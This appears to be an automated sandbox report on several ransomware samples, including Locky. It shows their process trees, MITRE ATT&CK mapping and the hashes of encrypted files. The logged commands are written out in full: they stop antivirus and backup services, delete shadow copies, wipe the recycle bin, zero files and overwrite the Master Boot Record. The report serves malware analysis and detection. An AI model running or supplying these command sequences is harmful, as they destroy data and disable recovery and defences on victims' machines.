C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:6320
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:5576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:6156
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:4884
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:5304
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:3020
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:4508
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:536
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:4692
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1600
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3612
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:6184
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5868
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5516
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5564
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5384
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5904
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:448
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5616
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5140
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1536
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:2448
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:6008
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4188 -
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1764
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe2⤵PID:824
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1724
-
-
-
C:\Users\Admin\Desktop\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"C:\Users\Admin\Desktop\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵PID:5976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4276
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:6908
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵PID:7060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:6948
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:7048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:1876
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:6892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2888
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:6676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:6304
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:6528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:6396
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:6548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:1500
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:5204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:1152
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:6824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:6412
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:220
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4864
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:5004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:3628
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:6500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:6204
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:6496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:2388
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:6092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:1544
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:6088
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:6976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:6732
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:6452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:3668
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:6812
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:6164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:6160
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:3068
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:6036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:2088
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:6856
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:7148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6804
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:5456
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:4368
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:7064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:3020
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:5460
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:4068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:908
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:6120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:5716
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:3256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:5684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:6880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:5852
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:3124
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:1672
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:2688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:5128
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:6136
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:6228
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:5840
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:5444
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5540
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:6712
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5748
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:6032
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:7144
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:7032
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:6244
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4576
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:6444
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:468
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:6224
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:4772
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:5500
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:6992
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:6392
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:5796
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta2⤵
- Blocklisted process makes network request
PID:1876
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7164 -
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5692
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:6052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe2⤵PID:6204
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:6260
-
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\bbb0245e829e4897881a1e2526d14822 /t 1280 /p 60081⤵PID:4764
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b9bf3f7b1fea48d090a6cb2471325d13 /t 6064 /p 18761⤵PID:3360
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
PID:5924
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\d53d2217cd1b411795b10fd5e2ebe192 /t 6096 /p 59241⤵PID:5140
-
C:\Users\Admin\Desktop\Locky.exe"C:\Users\Admin\Desktop\Locky.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6952
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys904D.tmp"2⤵PID:1784
-
-
C:\Users\Admin\Desktop\1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe"C:\Users\Admin\Desktop\1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5460 -
C:\Users\Admin\55246726\protect.exe"C:\Users\Admin\55246726\protect.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6796
-
-
C:\Users\Admin\55246726\assembler.exe"C:\Users\Admin\55246726\assembler.exe" -f bin "C:\Users\Admin\55246726\boot.asm" -o "C:\Users\Admin\55246726\boot.bin"2⤵
- Executes dropped EXE
PID:5256
-
-
C:\Users\Admin\55246726\overwrite.exe"C:\Users\Admin\55246726\overwrite.exe" "C:\Users\Admin\55246726\boot.bin"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4492
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3804855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
PID:5268
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Defense Evasion
Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
2Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c7fd8ea5c12ecb09bb193d2e443170cf
SHA1742a1ad78508980226cc40ad2ad52c248cad6436
SHA2568ddc329176cecfec346aec0262d01cfec44373442412da7db56bad1924e7a019
SHA512187f7fd13db61476fad865be2f15dd427e518109e101d57bd6c21e4767449dff910246010ec740ce49e8ce2bd423ff953c426c859f226a97657dfde106a255d2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun
Filesize720B
MD575a585c1b60bd6c75d496d3b042738d5
SHA102c310d7bf79b32a43acd367d031b6a88c7e95ed
SHA2565ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834
SHA512663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun
Filesize7KB
MD572269cd78515bde3812a44fa4c1c028c
SHA187cada599a01acf0a43692f07a58f62f5d90d22c
SHA2567c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7
SHA5123834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun
Filesize7KB
MD5eda4add7a17cc3d53920dd85d5987a5f
SHA1863dcc28a16e16f66f607790807299b4578e6319
SHA25697f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2
SHA512d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun
Filesize15KB
MD57dbb12df8a1a7faae12a7df93b48a7aa
SHA107800ce598bee0825598ad6f5513e2ba60d56645
SHA256aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77
SHA51296e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun
Filesize8KB
MD582a2e835674d50f1a9388aaf1b935002
SHA1e09d0577da42a15ec1b71a887ff3e48cfbfeff1a
SHA256904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb
SHA512b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun
Filesize17KB
MD5150c9a9ed69b12d54ada958fcdbb1d8a
SHA1804c540a51a8d14c6019d3886ece68f32f1631d5
SHA2562dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43
SHA51270193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun
Filesize448B
MD5880833ad1399589728c877f0ebf9dce0
SHA10a98c8a78b48c4b1b4165a2c6b612084d9d26dce
SHA2567a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27
SHA5120ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun
Filesize624B
MD5409a8070b50ad164eda5691adf5a2345
SHA1e84e10471f3775d5d706a3b7e361100c9fbfaf74
SHA256a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796
SHA512767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun
Filesize400B
MD52884524604c89632ebbf595e1d905df9
SHA1b6053c85110b0364766e18daab579ac048b36545
SHA256ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f
SHA5120b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun
Filesize560B
MD5e092d14d26938d98728ce4698ee49bc3
SHA19f8ee037664b4871ec02ed6bba11a5317b9e784a
SHA2565e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb
SHA512b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun
Filesize400B
MD50c680b0b1e428ebc7bff87da2553d512
SHA1f801dedfc3796d7ec52ee8ba85f26f24bbd2627c
SHA2569433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750
SHA5122d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun
Filesize560B
MD5be26a499465cfbb09a281f34012eada0
SHA1b8544b9f569724a863e85209f81cd952acdea561
SHA2569095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5
SHA51228196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun
Filesize400B
MD52de4e157bf747db92c978efce8754951
SHA1c8d31effbb9621aefac55cf3d4ecf8db5e77f53d
SHA256341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9
SHA5123042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun
Filesize560B
MD5ad091690b979144c795c59933373ea3f
SHA15d9e481bc96e6f53b6ff148b0da8417f63962ada
SHA2567805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1
SHA51223b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun
Filesize688B
MD565368c6dd915332ad36d061e55d02d6f
SHA1fb4bc0862b192ad322fcb8215a33bd06c4077c6b
SHA2566f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f
SHA5128bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun
Filesize1KB
MD50d35b2591dc256d3575b38c748338021
SHA1313f42a267f483e16e9dd223202c6679f243f02d
